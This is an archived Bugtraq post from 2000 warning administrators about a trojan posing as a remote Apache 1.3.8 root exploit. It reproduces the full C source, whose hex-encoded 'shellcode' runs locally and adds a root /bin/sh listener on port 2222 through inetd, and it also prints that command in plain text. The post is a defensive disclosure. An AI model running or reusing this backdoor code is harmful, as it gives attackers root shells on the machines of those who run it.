The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке
.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

don't run random "exploit" code


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 8 Feb 2000 14:55:48 -0700
From: Marc Slemko <marcs@ZNEP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: don't run random "exploit" code

-----BEGIN PGP SIGNED MESSAGE-----

Below is some code that I have seen a number of times, with some
very slight variations, over the past few months.  I have no idea
how many people have been tricked by it.  This does not exploit
any hole in Apache, period.  As a simple inspection shows you, it
will run:

echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h

on the local machine.  If you try this "exploit" as root, it will
certainly try to compromise your machine.  But not remotely and it
is nothing to do with Apache or any bug other than the "bug" of
admins running random code as root.

I know this should be too obvious to have to say and should be no news to
anyone here, but: do not run random supposed exploits as root on your box
without knowing what they do.  Do not even run them as a non-root UID
unless it is a throwaway UID (better yet, a throw away box) and you have
examined what the program does.  This obviously applies to things posted
to bugtraq but, even more so, to "secret" exploits you may find or be
sent.

Again: the below code has nothing to do with any supposed security hole
in Apache.

To top it all off, in this case is the fact is that there was never
an Apache 1.3.8 released to exploit.  Apache went from 1.3.6 to
1.3.9.

I am posting this to chop off any rumors of a "secret" Apache root exploit
at the knees as well as to give people an example of why they shouldn't do
silly things.

Thanks.


/* remote apache 1.3.8 root exploit (linux) */

#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] = \
         "\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
         "\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
         "\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
         "\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
         "\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
         "\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";


#define NOP     0x90
#define BSIZE   256
#define OFFSET  400
#define ADDR    0xbffff658
#define ASIZE   2000

int
main(int argc, char *argv[])
{
        char *buffer;
        int s;
        struct hostent *hp;
        struct sockaddr_in sin;
        if (argc != 2) {
                printf("%s <target>\n", argv[0]);
                exit(1);
          }
        buffer = (char *) malloc(BSIZE + ASIZE + 100);
        if (buffer == NULL) {
                printf("Not enough memory\n");
                exit(1);
          }
        memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
                strlen(shellcode));
        buffer[BSIZE + ASIZE] = ';';
        buffer[BSIZE + ASIZE + 1] = '\0';
        hp = gethostbyname(argv[1]);
        if (hp == NULL) {
                printf("no such server\n");
                exit(1);
          }
        bzero(&sin, sizeof(sin));
        bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s < 0) {
                printf("Can't open socket\n");
                exit(1);
          }
        if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
                printf("Connection refused\n");
                exit(1);
          }
        printf("sending exploit code...\n");
        if (send(s, buffer, strlen(buffer), 0) != 1)
                printf("exploit was successful!\n");
          else
                printf("sorry, this site isn't vulnerable\n");
        printf("waiting for shell.....\n");
        if (fork() == 0)
              execl("/bin/sh", "sh", "-c", shellcode, 0);
          else
                wait(NULL);
        while (1) { /* shell */ }
}



- --
     Marc Slemko     | Apache Software Foundation member
     marcs@znep.com  | marc@apache.org

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBOKCQ51Qv/g4Arev1AQEsqwP/Rs5+WrJtuTavrvpPh2Fwfc5twpYVDTrh
mlLUYzfReB8T0gUDgjr5/SEO/KDcn/i+qwQ8V7y5XWqRLUx4j+QVZNW+HIzQnoH3
6cbqIUT1vH49fMQIO/5tsuYvFlRX+sN/HIILTtVlc32Ok9TOBapiRTfSl29tROjS
SolcNQONdyk=
=6HcL
-----END PGP SIGNATURE-----

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
RB2 Network.